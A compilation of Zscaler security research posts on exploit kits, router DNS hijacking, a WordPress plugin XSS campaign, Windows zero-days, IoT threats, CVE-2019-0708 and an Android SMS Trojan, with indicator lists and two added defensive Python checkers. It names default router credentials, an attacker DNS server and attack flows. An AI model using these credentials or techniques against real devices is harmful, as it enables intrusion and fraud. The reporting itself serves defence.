RIG EK has continued to be active through the quarter. Though EK activity has declined overall, RIG EK activity has been persistent. We saw no changes in the kit's behavior compared to the previous quarter. Below we can see the hits for RIG EK activity.

Figure 1: RIG EK hits from 1 March 2019 to 20 May 2019

The geographical distribution of RIG EK hits is shown below.

Figure 2: RIG EK heat map showing infection regions

One instance of RIG EK activity can be seen below.

Figure 3: RIG EK infection cycle

The obfuscated JavaScript on the landing page is shown below.

Figure 4: RIG EK landing page obfuscated JavaScript

We observed the use of two malicious scripts on the landing page. The first targets CVE-2016-0189, a Scripting Engine Memory Corruption Vulnerability affecting IE 11 and below. The second targets CVE-2018-8174, a Windows VBScript Engine Remote Code Execution vulnerability affecting Windows 10, 7, and 8.1, and Windows Server 2008, 2012, and 2016. We also saw the use of the Adobe Flash exploit CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player version 28.0.0.161 and earlier. The snippet of code targeting the CVE-2018-4878 vulnerability can be seen in the decompiled Flash file below.

Figure 5: Decompiled Flash exploit in RIG EK cycle; CVE-2018-4878

The malware payloads seen with RIG EK this quarter belonged to the SmokeLoader and AZORult families.

Underminer EK

Underminer EK is relatively new; we started seeing activity for this EK over the past six months. We see this exploit kit serving its payloads over custom HTTP ports. The recent hits for Underminer EK are shown below.

Figure 6: Underminer EK hits from 1 March 2019 to 20 May 2019

The geographical distribution of Underminer EK hits is shown below.

Figure 7: Underminer EK heat map showing infection regions

An infection cycle for Underminer EK is shown below.

Figure 8: Underminer EK infection cycle

The majority of the activity that we have seen for Underminer EK starts with a malvertising campaign involving a popcash[.]net URL that redirects users to a malicious domain, adpop[.]live. The malicious domain serves content over HTTPS, which further redirects the user to the Underminer EK landing page. The call to the Underminer EK on the malicious domain adpop[.]live is shown below.

Figure 9: Underminer EK landing page call on malvertisement page

This landing page contains a call to the malicious SWF payload. This call can be seen in the screenshot below.

Figure 10: Underminer EK call for Flash exploit

The malware payload seen in this cycle was a bootkit Trojan.

Spelevo EK

We started seeing activity for a new exploit kit called Spelevo in March 2019. The Spelevo EK authors integrated the relatively new Flash exploit CVE-2018-15982. The hits for Spelevo EK activity are shown below.

Figure 11: Spelevo EK hits from 1 March 2019 to 20 May 2019

The geographical distribution of Spelevo EK hits is shown below.

Figure 12: Spelevo EK heat map showing infection regions

An infection cycle for Spelevo EK is shown below.

Figure 13: Spelevo EK infection cycle

The image below shows the Spelevo EK malvertisement redirect to the EK landing page.

Figure 14: Spelevo EK malvertisement redirect

The Spelevo EK landing page contains an obfuscated JavaScript browser plugin detection script to determine the Adobe Flash Player version that the user's system is running. The obfuscated JavaScript along with the decoded script is shown in the image below.

Figure 15: Spelevo EK landing page and deobfuscated browser plugin detect JavaScript

The same page serves a redirect URL based on the conditions met.

Figure 16: Spelevo EK Flash Player plugin detect

Once the Adobe Flash version is found to be vulnerable, the user is served a malicious SWF file exploiting a use-after-free vulnerability (CVE-2018-15982) in Adobe Flash Player versions 31.0.0.153 and earlier. The cycle did not serve any malware payload on our test machine, but malware activity has been reported on successful exploitation in the wild.

Other exploit kits

We also observed some exploit kit activity directed towards routers and focused on hijacking DNS queries. A snippet of scan code served by a router exploit kit is shown below.

Figure 17: Scan script served by a router exploit kit

Based on the target IP addresses seen online, the script then calls another obfuscated malicious JavaScript; a sample script served by such an exploit kit can be seen below.

Figure 18: Obfuscated JavaScript on a router exploit kit landing page

A Base64-decoded version of the landing page shows the DNS hijacking script below. In this screenshot we see the script trying to target the gateway IP with default credentials; in this case, the script attempts to log in with the user name "admin" and an empty password. If the attempt is successful, the DNS address is modified to the attacker's DNS address (158.255.7[.]150) along with a backup legitimate public DNS address (8.8.4[.]4).

Figure 19: Base64-decoded JavaScript showing the DNS hijacking configuration

Another instance of a default credential being used to target routers is shown below.

Figure 20: Default credentials being targeted by router exploit kits

Here we see the password "gvt12345" being used along with the username "admin." A quick Google search for this password pattern reveals that it might have been used as a default password by a few Brazilian ISPs and has been used before in similar attacks. Checking name resolution using the attacker's DNS server shows the DNS redirect behavior in action, as shown below.

Figure 21: DNS resolution using the attacker’s DNS server shows name resolution to a phishing IP

In this case, the server IP resolved by the DNS server for www.google[.]com is a malicious server that is controlled by the attacker and used to serve phishing content to victims.

GrandSoft EK, Magnitude EK, and Fallout EK did not show changes during the quarter. We did not see activity this quarter for other recent exploit kits such as Terror EK, KaiXin EK, and Disdain EK.

Conclusion

This quarter we saw the addition of Spelevo and Underminer to the exploit kit threat landscape, and we saw some EK activity targeting routers. Exploit kits are effective, as they can infect a victim's machine during web browsing without the user's knowledge. The attackers monetize the successful infections in a variety of ways, such as by collecting a ransom for retrieving data encrypted by ransomware, mining cryptocurrencies using the victim's system resources, or installing banking Trojans to steal a victim's identity. Attackers frequently change their techniques by obfuscating the source code or integrating new exploit code into their EKs, and security researchers analyze and block the new threats by tracking changes in EK behavior.

To help avoid infections from exploit kits, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements. Keeping browser plugins and web browsers up to date with the latest patches helps to protect against common vulnerabilities targeted by exploit kits.

The Zscaler ThreatLabZ research team has confirmed coverage for these top exploit kits and subsequent payloads, ensuring protection for organizations using the Zscaler cloud security platform.

Malicious JavaScript injected into WordPress sites using the latest plugin vulnerability

Zscaler Research - 52 min 35 sec ago
WordPress is by far the most popular content management system (CMS) and, because of its wide usage, it is also popular among cybercriminals. Most of the WordPress sites that have been compromised are the result of attackers exploiting vulnerable versions of the plugins used.

A stored cross-site scripting (XSS) vulnerability was discovered last week in the popular WordPress Live Chat Support plugin. The vulnerability allows an unauthenticated attacker to update the plugin settings by calling an unprotected "admin_init" hook and injecting malicious JavaScript code everywhere on the site where Live Chat Support appears. All versions of this plugin prior to version 8.0.27 are vulnerable. The patch for this vulnerability was released on May 16, 2019; version 8.0.27 and higher are fixed.

ThreatLabZ researchers recently discovered what may be the first campaign in which attackers are exploiting the Live Chat Support plugin vulnerability and injecting a malicious script responsible for malicious redirection, unwanted pop-ups, and fake subscriptions. While it is not yet a widespread attack, the number of compromised websites is growing (at the end of this blog there is a link to the names of the compromised sites).

Fig 1: Hits of the compromised WordPress sites

Fig 2: WordPress site using a vulnerable version of the Live Chat Support plugin

Fig 3: Obfuscated script injected in the compromised WordPress site

Fig 4: Deobfuscated version of the injected script

The injected script sends a request to the URL hxxps://blackawardago[.]com to execute the main script.

Fig 5: Request and response to hxxps://blackawardago[.]com

After the execution of the above script, the victim is redirected to multiple URLs, mainly related to pushing unwanted popup ads and fake error messages.

Fig 6: Highlighted (red) multiple redirected URLs after the execution of the malicious script

Fig 7: Popups after execution of the malicious script

The domain that hosts the malicious script is a newly created domain hosted on a dedicated IP address.

Fig 8: Whois information of the domain

Conclusion

Cybercriminals actively look for new vulnerabilities in popular content management systems such as WordPress and Drupal, as well as in the popular plugins found on many websites. An unpatched vulnerability in either the CMS or an associated plugin provides an entry point for attackers to compromise the website by injecting malicious code, impacting the unsuspecting users visiting these sites. It is critical for website owners to apply the security update if they are using the vulnerable plugin, particularly because it is a pre-auth vulnerability and can lead to widespread compromise. The Zscaler ThreatLabZ team is actively tracking and reviewing all such malicious campaigns to ensure that our customers are protected.

IOCs
blackawardago[.]com
216[.]10[.]243[.]93

List of compromised sites is available here.
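Site owners can check both halves of this post mechanically: whether the installed Live Chat Support version is below the fixed release, and whether their pages already load a script from the IOC domain. The following Python script is an added example, not from the post or from the plugin's authors. It reads the "Version:" line of a WordPress plugin's main PHP file header (the standard plugin header format), compares it against 8.0.27 as stated in the post, and scans page HTML for script tags referencing blackawardago[.]com. The plugin header text and the page HTML are constructed samples.

```python
"""Version and IOC checks for the Live Chat Support issue described in the post.

Added example, not from the post or the plugin. The fixed version (8.0.27) and the IOC
domain come from the post; SAMPLE_PLUGIN_HEADER and SAMPLE_PAGE are constructed.
"""
import re

PATCHED_VERSION = (8, 0, 27)        # Live Chat Support 8.0.27 and higher are fixed (from the post)
IOC_DOMAIN = "blackawardago.com"    # from the post's IOC list, de-fanged


def parse_version(text):
    """'8.0.26' -> (8, 0, 26); a trailing suffix such as '-beta' is ignored."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable_version(text):
    """True when the plugin version is below 8.0.27; short versions are zero-padded (8.0 == 8.0.0)."""
    v = parse_version(text)
    width = max(len(v), len(PATCHED_VERSION))
    return v + (0,) * (width - len(v)) < PATCHED_VERSION + (0,) * (width - len(PATCHED_VERSION))


# Matches 'Version: 8.0.26' whether the header uses '/* ... */' or ' * ' comment lines.
_HEADER_VERSION = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.MULTILINE)


def version_from_plugin_header(php_source):
    """Read the 'Version:' field of a WordPress plugin file header; None if absent."""
    m = _HEADER_VERSION.search(php_source)
    return m.group(1) if m else None


_SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']([^\"']+)", re.IGNORECASE)


def page_loads_ioc_script(html):
    """True if any <script src> on the page points at the IOC domain."""
    return any(IOC_DOMAIN in src.lower() for src in _SCRIPT_SRC.findall(html))


def audit(plugin_source, page_html):
    """Combine both checks into one result dict for a site."""
    version = version_from_plugin_header(plugin_source)
    return {
        "version": version,
        "vulnerable_version": version is not None and is_vulnerable_version(version),
        "ioc_script_present": page_loads_ioc_script(page_html),
    }


# Constructed sample header in the standard WordPress plugin header format.
SAMPLE_PLUGIN_HEADER = """<?php
/*
Plugin Name: Live Chat Support
Version: 8.0.26
*/
"""

# Constructed sample page; the script path is a placeholder, the post names only the domain.
SAMPLE_PAGE = '<html><body><script src="https://blackawardago.com/placeholder.js"></script></body></html>'

if __name__ == "__main__":
    print(audit(SAMPLE_PLUGIN_HEADER, SAMPLE_PAGE))
```

A version below 8.0.27 with no IOC script present still needs the update: the post describes a pre-auth vulnerability, so absence of this particular script only means this campaign has not reached the site yet.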

Microsoft vulnerability: Source code published for three zero-day vulnerabilities in Windows

Zscaler Research - 52 min 35 sec ago
Background

A security researcher (with the pseudonym SandboxEscaper) has discovered three zero-day vulnerabilities in Microsoft Windows. Their POC and source code have been released on GitHub. Two of these are local privilege escalation (LPE) vulnerabilities; they have been tested to work on Windows 10 only. The third vulnerability is a sandbox bypass in Internet Explorer 11 (IE11). As of this writing, no patch has been released by Microsoft for these vulnerabilities.

What is the issue?

The security researcher has published three POCs: angrypolarbearbug2, bearlpe, and sandboxescape.

The first vulnerability, angrypolarbearbug2, can be exploited by performing specially crafted DACL (discretionary access control list) operations when the Windows Error Reporting service tries to write a DACL for the given Windows Error Reporting (.wer) file. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker.

The second vulnerability, bearlpe, targets the way the Windows Task Scheduler service uses the SetJobFileSecurityByName() function to write the DACL for the job file. For this exploit to work, one needs the "schtasks.exe" and "schedsvc.dll" files from Windows XP. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker.

The third vulnerability, sandboxescape, bypasses the IE11 sandbox and allows an attacker to execute code in IE low-protection mode. To exploit this vulnerability, an attacker needs to inject a special DLL into the IE process. According to reports, this exploit cannot be triggered remotely.

What systems are impacted?

The POC has been tested on Windows 10 32-bit and 64-bit and IE11.

Zscaler coverage

Advanced Threat Signatures:
Win32.Exploit.Bearlpe
Win32.Exploit.CVE.2019.0863
Win32.Exploit.Polarbearescape
W32/Agent.NBHI

Zscaler Cloud Sandbox provides proactive coverage against exploit payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.

IoT traffic in the enterprise is rising. So are the threats.

Zscaler Research - 52 min 35 sec ago
Do you know exactly what IoT devices are on your network and how active they are? You’d better, because they might be opening the door to cybercrime.

IoT devices are, of course, nonstandard computing devices that connect wirelessly to a network and have the ability to transmit data. These devices can communicate and interact over the internet, and they can be remotely monitored and controlled. Connected devices are part of a scenario in which every device talks to other related devices in an environment to automate home and industrial tasks, and to communicate usable sensor data to users, businesses, and other interested parties. IoT devices are meant to work in concert for people at home, in industry, or in the enterprise.

Enterprises around the globe have been adopting IoT products to improve organizational efficiency, enhance communications, and gain insight into system performance. According to Gartner, 20.4 billion IoT devices will be in use worldwide by 2020, and more than 65 percent of enterprises will adopt IoT products. That translates to quite a bit of budget being dedicated to these devices. IDC has predicted that IoT spending will reach $745 billion in 2019 and surpass the $1 trillion mark in 2022. That’s a 15 percent increase over 2018’s $646 billion. According to the same report, the U.S. and China will be spending the most at $194 billion and $182 billion, respectively. They are followed by Japan, Germany, Korea, France, and the UK.

Analyzing IoT transactions

To help organizations get a better understanding of IoT activity in the enterprise, the ThreatLabZ research team analyzed IoT traffic across the Zscaler cloud during a one-month period between March and April 2019. The analysis looked at the types of devices in use, the protocols they used, the locations of the servers with which they communicated, and the frequency of their inbound and outbound communications, as well as IoT traffic patterns.

The report, titled IoT in the Enterprise: an analysis of traffic and threats, provides a general overview of the most frequently seen device categories, then takes a deep dive into the transaction data for specific types of IoT devices. It also explores some of the security concerns around IoT devices, including the use of plain-text channels and the threat of malware.

Emerging threats

The rapid adoption of these IoT devices has opened up new attack vectors for cybercriminals. And, as is often the case, IoT technology has moved more quickly than the mechanisms available to safeguard these devices and their users. Researchers have already demonstrated remote hacks on pacemakers and cars. And, in October 2016, a large distributed denial-of-service (DDoS) attack, dubbed Mirai, affected DNS servers on the east coast of the United States, disrupting services worldwide. This attack was traced back to hackers infiltrating networks through IoT devices, including wireless routers and connected cameras.

In August 2017, the U.S. Senate introduced the IoT Cybersecurity Improvement Act, a bill addressing security issues associated with IoT devices. While it is a start, the bill only requires internet-enabled devices purchased by the federal government to meet minimum requirements, not the industry as a whole. However, it is being viewed as a starting point that, if adopted across the board, could pave the way to better IoT security industry-wide.

One of the ThreatLabZ team’s discoveries was that the vast majority of IoT transactions were occurring over plain-text channels instead of the more secure SSL-encrypted channels. While a major security vulnerability, the use of unsecured channels is just one vulnerability with IoT devices. They are notorious for weak, preset passwords that often go unchanged.

Malware in IoT traffic

As with just about every device connected to the internet, malware is also a threat to IoT devices. Each quarter, the Zscaler cloud blocks approximately 6,000 transactions from IoT-based malware and exploits. And, earlier this year, the Zscaler ThreatLabZ team analyzed certain threats that were targeting IoT devices. The fact is that there has been almost no security built into the IoT hardware devices that have flooded the market in recent years, and there’s typically no way to easily patch these devices. While many businesses have thought security for IoT devices unnecessary because nothing is stored on the devices, this isn’t the case. The Mirai botnet attack illustrated how exposed companies can be as a result of their IoT devices.

Even though these devices continue to be an easy target for cyberattacks, enterprises can take steps to reduce the risk:
- Change default credentials to something more secure. As employees bring in devices, encourage them to be sure their passwords are strong and their firmware is always up to date.
- Install IoT devices on isolated networks (to prevent lateral movement), with restrictions on inbound and outbound network traffic.
- Restrict access to the IoT device as much as possible from external networks. Block unnecessary ports from external access.
- Apply regular security and firmware updates to IoT devices, in addition to securing the network traffic.
- Finally, deploy a solution to gain visibility of the shadow IoT devices that are already sitting inside the network and ensure the above safeguards.

Advanced security for IoT devices

IoT devices have become commonplace in enterprises from all industries and in nearly every corner of the globe. These devices were designed to help improve efficiency and expand communications, and organizations continue to explore new ways to incorporate these devices into everyday operations. Of course, many of the devices are employee-owned, and this is just one of the reasons they are a security concern.

With all of these new connected devices, and the enormous amounts of associated data traversing your network and opening up new attack vectors for cybercriminals, can you trust your legacy network to provide adequate security? The security of your enterprise hinges on your answer.

Read the entire report, IoT in the Enterprise: an analysis of traffic and threats.

I’d like to thank our Sr. Security Researcher Viral Gandhi for his help in compiling the report.

Deepen Desai is VP of Security Research at Zscaler

Critical Update: Windows Remote Desktop Services Vulnerability

Zscaler Research - 52 min 35 sec ago
Background

Earlier today Microsoft released several security updates as part of its regular monthly updates known as Patch Tuesday. One of the issues that was patched in today's update, CVE-2019-0708, is critical, and all Windows users should apply the patches immediately, regardless of whether or not they are running the vulnerable operating system. Large organizations following 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible, especially if running one of the vulnerable operating systems.

What is the issue?

CVE-2019-0708 is a remote code execution vulnerability in Microsoft Windows Remote Desktop Services that affects several older versions of the Windows operating system. What makes this vulnerability unique, and alarming, is that an attacker attempting to exploit the vulnerability does not have to be authenticated to the target machine and needs no interaction from the target user for the machine to be compromised. In other words, this can and most likely will be exploited by malware authors to spread payloads rapidly, from unpatched system to unpatched system. There have been no exploitations detected yet, but this is the type of vulnerability that could lead to another attack like WannaCry, which caused massive disruptions in organizations around the world in May 2017.

What systems are impacted?

Windows XP, Windows 2003, Windows 7, Windows Server 2008 R2, and Windows Server 2008 operating systems are vulnerable. Windows 8 and Windows 10 operating systems are NOT vulnerable.

What can you do to protect yourself?

Microsoft has been proactive in releasing security updates for the unsupported operating systems, given the critical nature of this vulnerability. Apply the security updates released by Microsoft immediately from the following locations:

For supported operating systems:
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EGB

For unsupported end-of-life operating systems [Windows XP and 2003]:
https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

Zscaler coverage

Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.

Working together to understand the threat landscape

Zscaler Research - 52 min 35 sec ago
As a society, we are more connected than ever before. Our community is no longer just the people living nearby. It is now a global community, made up of disparate individuals connected not by proximity but by the internet. As in almost any community, crime is a factor. In today’s digital society, that means cybercriminals, and they seem to be launching new attacks every day. These cybercriminals have gone from lone hackers to sophisticated criminal organizations, launching attacks on individuals, corporations, and governments. As these criminals have become more organized, the challenge in fighting them has become more difficult. If the cybercriminals are working together to increase their chances of success, it makes sense that those who fight these bad actors should also work together.

Today, Verizon released its 2019 Data Breach Investigations Report, and I am proud that the Zscaler ThreatLabZ team once again actively contributed to the findings in this report.

The Verizon 2019 Data Breach Investigations Report takes an in-depth look at security incidents and data breaches that occurred in 2018. The report analyzes 41,686 security incidents, of which 2,013 were confirmed data breaches. It looks at how the results have or have not changed over the years and digs into the overall threat landscape and the actors, actions, and assets that are present in breaches. The report delves into security incident patterns and describes how they correlate to the various industry verticals. In addition to these primary patterns, the report includes a subset of data to pull out financially motivated social engineering (FMSE) attacks, which are more focused on credential theft and duping people into transferring money into adversary-controlled accounts.

Among the findings, the report revealed that 43 percent of data breaches occurred at small businesses, which tend to have less stringent security than larger organizations, making them an easier target. The most common tactic used in breaches was hacking (52 percent of the time), while errors (21 percent) and misuse by authorized users (15 percent) also led to breaches. And, as can be expected, financial gain was the most common motivation (71 percent).

These results, and the others detailed in the report, are based on data collected from a variety of sources, including publicly disclosed security incidents, cases provided by the Verizon Threat Research Advisory Center (VTRAC) investigators, and external collaborators, such as ThreatLabZ. The year-to-year data includes new sources of incident and breach data as more organizations share information to improve the diversity and coverage of real-world events. The number of organizations providing data continues to grow, with 66 organizations external to Verizon now contributing to this report. This community of data contributors represents an international group of public and private entities that understand the importance of sharing information to gain a better understanding of the threats we all face on a daily basis.

This is the second consecutive year that Zscaler has provided transaction data for the report. The ThreatLabZ team examined transactions processed in the Zscaler cloud during 2018, specifically looking for attempted phishing attacks and blocked malware. We also offered insights into each threat category with supporting telemetry information indicating the number of users affected by these security incidents and data breaches.

It is heartening to see so many organizations coming together to share information in an ongoing effort to secure the internet and this digital world in which we all participate. Unfortunately, cybercriminals will continue developing new threats and attack methods, as long as there’s a potential payoff. And, since there is no sign of attackers stopping any time soon, it is up to all of us working in the cloud and cybersecurity industries to work together to make their job a lot more difficult. I think Gloria Macapagal Arroyo, the 14th President of the Philippines, said it very well: “The power of one, if fearless and focused, is formidable, but the power of many working together is better.”

Download the entire Verizon 2019 Data Breach Investigations Report.

Deepen Desai is vice president of security research at Zscaler
Categories: Security Posts

From third-party Android store to SMS Trojan

Zscaler Research - 52 min 35 sec ago
In lieu of downloading and installing apps from the official Android app store, users often turn to third-party stores. The reasons vary, from wanting a particular app that isn’t available on the official store to seeking cracked apps—versions that have been modified to disable certain features, such as copyright protections—of official Android apps. Recently, the ThreatLabZ research team came across one of these third-party app stores that seemed to be hosting Android games. The store, called “Smart Content Store,” portrays itself as an Android app store and uses names such as sexy.smartcontentstore[.]com and games.smartcontentstore[.]com.

Fig 1: Third-party app store homepage

At first glance, the site appears to be an app store hosting Android games, but we were unable to download any apps. Clicking the Install option on any of the games, as seen in the screenshot above, leads back to the same page.

Upon further examination, we found many direct links to APKs being downloaded from these domains. The image below shows the direct downloads of these APKs.

Fig 2: Zscaler dashboard

These apps have different package names and certificates, but every app exhibits the same functionality. We have provided an analysis of one of the apps below. (A complete list of apps can be found in the IOCs at the end of the blog.)

App summary
APK Name: smartworld_-_WIN_-_500929091890143_-_.apk
Package name: vaya.bailecito.epore.saturda
Size: 2100203 bytes
MD5: 091E91A9ED7202CD44DC5E1C4B3DCC90

Technical details
As soon as the app is installed, it appears as a blank space. As shown in the screenshot below, the app icon and app name are missing. Upon clicking the space (the invisible icon), the app displays its first activity with two options: Smart World and Sexy World.
Fig 3: Invisible app icon and the first activity

During the initial phase, the app sends several requests to hxxp://play4funclub[.]com/public/notification/is-active, but during our analysis we received only a 301 Moved Permanently response. These requests can be seen in the screenshot below.

Fig 4: Initial requests

Upon clicking either of the two options shown above, Smart World or Sexy World, the app asks for Administrator privileges, stating “To view all the porn videos you need to update. Click to activate.” This message can be seen in the screenshot below (left image).

Fig 5: Admin privileges

As soon as the victim activates admin rights, a request is sent to another domain. Nothing happened as a result of this request, so we believe that it is simply an indication to the attacker of whether the victim has activated admin rights or not.

Fig 6: Request upon enabling admin rights

After a certain amount of time passes, the app starts sending requests to hxxp://app.in-spicy[.]com/scripts/app_sms_request_get_number.php with details about the victim's device and location. It sends the following information in its POST request:
Android version
Installation date
Version
Date (date of the request)
Country code
Carrier
Device ID

The screenshot below shows the request and response taking place between the compromised device and the attacker:

Fig 7: Request and response related to the SMS message

The app acts according to the response received from the attacker’s domain. If the response contains "status":"OK", the app fetches the desired details from the response; in our case, these were a phone number and a message body. It then sends an SMS message with that body to that number. This functionality is visible in the screenshot below: the response from the attacker is held in paramJSONObject, and based on that response the app calls sendTextMessage, the routine that sends the actual SMS messages.
Fig 8: Sending SMS functionality

During this phase of analysis, we observed several attempts to send SMS messages to different phone numbers with different text as the message body. This can result in high costs to the victim. Some examples of the SMS messages can be seen in the table below:

Phone #          Message Body
6768482371       message:france athletes employed
6857215675       message:experience iran yarn combines field
6768482371       message:luther exercise queens
2347003300131    message:hungary contributing task bird
6857215675       message:boolean wisconsin criticism verification republic
2347003300131    message:exchange audience nc medicaid
2347003300131    message:ut controlled salt customized consider
6768482371       message:legislative wayne brand hungarian
6768482371       message:consulting gui contrary eclipse
79697530171      message:boards tits difficulties
6768482371       message:royalty relay mv
6768482371       message:boards sie gabriel computer
6768482371       message:mods html chronic
6768482371       message:integer coleman monsters
6745596671       message:capabilities labels addiction
6768482371       message:checking upskirt football possibilities
6745596671       message:academics actively matrix ga
2347003300131    message:incidence quality mrs estimated default
6745590060       message:estate mexican legal flour
6768482371       message:cleared connectivity divx
2347003300131    message:cafe activists our constantly
6745596671       message:brush accepted role
6745596671       message:plain weed senators reform framing
6745596671       message:represents fig answers signup
6745596671       message:animation failure lucas browser poetry
2347003300131    message:biodiversity present solving herbal regulations
6857215675       message:shakira wanna movie freight
6768482371       message:shipping uzbekistan senators optimize basically
6857215675       message:folks tamil cooper
6857215675       message:picking maine shapes men wives

This app also has permission to view the victim’s contact list, which means the app could easily spread itself using those contacts.
We also found other high-level permissions, and we are analyzing the sample further to determine their functions and potential impact. We will update this report with any interesting findings.

Conclusion
The Zscaler Cloud Sandbox successfully flagged the sample as malicious based on indicators found in the sample, as shown in the report screenshot below.

Fig 9: Zscaler Cloud Sandbox

Zscaler advises Android users to download apps only from official app stores. Using third-party stores may lead to the installation of apps that have hidden, malicious intentions, as described in this case. We also advise users to keep the Unknown Sources option off at all times on their Android devices; keeping it off prevents any third-party app from being installed directly on the device.

IOCs

Domains
app.in-spicy(dot)com
insidecontentsp(dot)com
incontsmart(dot)com

MD5
044b97016fdcd22c8c2211014e65c562
bb5a4cea098a29ac8533c561784908b4
58f237f346d81385eaa2005cd642e28c
f50091fbe2fef0c9501f242afb356c96
2cbf13b90b76300f9668c2660b9cbc35
5c68ff95c2278da0fcc13b4c46f7978b
091e91a9ed7202cd44dc5e1c4b3dcc90
88c2ccec249ff6df0fd525e09e700861
8ac5e78f4bc7212fcadd805c924ba67c
eaa2f149f33e35906095857064721044
60772ad9808a5bab595f3459e8d5bb4c
9f4ff0d5425f1542fe4aef50cb1b20dd
64d5bba5e3a18f971ee5904ccc9b7826
20614d2d2471b2a7fcfbbf67f0fdbfb6
6f31a49153b6b504ce8804c91113852f
d717c2c4ebce47d40aea491e911b1c5d
3124ae1a165d2fd1f5ab4e6b83a1100a
4f3289108728c33866e62e99a1fed40d
1a027810c28fad34c7590ddb18dc6a51
4fd81f83d8cb40f6fb0bd1ad94b8ea7f
32131606ac4448683dad9148e4754f81
afe96ae477648b152e7434ac5c0790c6
793fc48a4947a3c19efc570ba8af1235
62ff00af19ad0ed02ab65f3d8a6ceb27
61d9506df0a016435297829bb386e4b8
61ded4d4c3268c354a794dc4c6dea530
81685083658d7e839e68489391f15a05
2bcc9865edb66883b82f43c34e6ac19d
a8a75b3055a9aa27a26d326061173287
8dbbcdfa3d4d1207e325890680f98d4a
58271be93858eb5baeaa401fe1d583bb
a350e8b88d586e26e9dc858c83407ebc
a5219ee0c3c10ca8db991d05fe34b9b0
ca17d9260a247e6457876a2f98e3fab7
064a46635c0bda86bcc42ae484ee5c25
874e3af735b6e17ddd596c29e2fc55d5
cfe0d20dbf674f8619584c850eda2186
0cadfdf04df0f3dba0e8a0fdb087993b
dada3ef23b89c9e0f535aa7dd49360e1
b34d3dbd6241f63670e010f7da05630b
43a70f5f1929e882894a023a67ffe23f
00b9c19f229892ad6f0c45f75a5bf729
154ee512e7142f56118209ec9375433d
4cd7745e9f0043ed3da046f88249b221
1efefb04a779b5cd7ccfc1aa4b104fc1
22b5cec87a9227abbaa6f120f4809230
0648e6c78d85ce62eed06fbb94283712
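The traits the analysis above describes (SMS sending, contact access, a request for device-administrator rights, and a launcher entry with no visible name) can be checked statically before an APK from a third-party store is installed. The following is an added example, not Zscaler's code: a small Python triage script over an AndroidManifest.xml. The manifest it parses is constructed for illustration, and the package name and class names in it are placeholders, not values from the analysed sample.

```python
"""Static triage of an Android manifest for the traits described in the post.

Added example, not Zscaler's code. It checks for the combination the
analysis describes: SMS-sending and contact-reading permissions, a
device-admin receiver (the "activate admin rights" prompt), and a launcher
entry with an empty label (one way an installed app shows up as a blank
space). The manifest below is constructed for illustration; the package
and class names are placeholders, not taken from the analysed sample.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def attr(name):
    """Build the namespaced key ElementTree uses for android:* attributes."""
    return "{%s}%s" % (ANDROID_NS, name)


# Permissions the post calls out, with the risk each one carries.
RISKY_PERMISSIONS = {
    "android.permission.SEND_SMS": "can send SMS to attacker-chosen numbers",
    "android.permission.READ_CONTACTS": "can harvest contacts to spread further",
    "android.permission.READ_PHONE_STATE": "can read device identifiers",
}

# Constructed sample manifest (placeholder names, not from the real APK).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="example.placeholder.smsapp">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <application android:label="Smart World">
        <activity android:name=".MainActivity" android:label="">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name=".AdminReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""


def triage_manifest(xml_text):
    """Return the findings a reviewer would want before installing the APK."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    app_label = app.get(attr("label")) if app is not None else None

    requested = {e.get(attr("name")) for e in root.iter("uses-permission")}
    risky = sorted(p for p in requested if p in RISKY_PERMISSIONS)

    # A receiver guarded by BIND_DEVICE_ADMIN is how an app registers as a
    # device administrator; the post shows the app nagging for that right.
    admin_receivers = [
        r.get(attr("name")) for r in root.iter("receiver")
        if r.get(attr("permission")) == "android.permission.BIND_DEVICE_ADMIN"
    ]

    # A LAUNCHER activity whose effective label is the empty string shows up
    # as a nameless entry. (A transparent icon cannot be judged from the
    # manifest alone; that needs the drawable resource.)
    hidden = []
    for act in root.iter("activity"):
        categories = {c.get(attr("name")) for c in act.iter("category")}
        if "android.intent.category.LAUNCHER" not in categories:
            continue
        label = act.get(attr("label"), app_label)
        if label is not None and label.strip() == "":
            hidden.append(act.get(attr("name")))

    profile = ("android.permission.SEND_SMS" in risky
               and bool(admin_receivers) and bool(hidden))
    return {
        "risky_permissions": risky,
        "device_admin_receivers": admin_receivers,
        "hidden_launcher_activities": hidden,
        "verdict": "sms-trojan profile" if profile else "no profile match",
    }


if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

The script only reads the binary-decoded manifest (as produced by apktool or aapt, for example); it does not decode the APK itself. It deliberately reports a profile match only when all three traits coincide, since SEND_SMS or a device-admin receiver on its own is also found in legitimate apps.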

NovaLoader, yet another Brazilian banking malware family

Zscaler Research - 52 min 35 sec ago
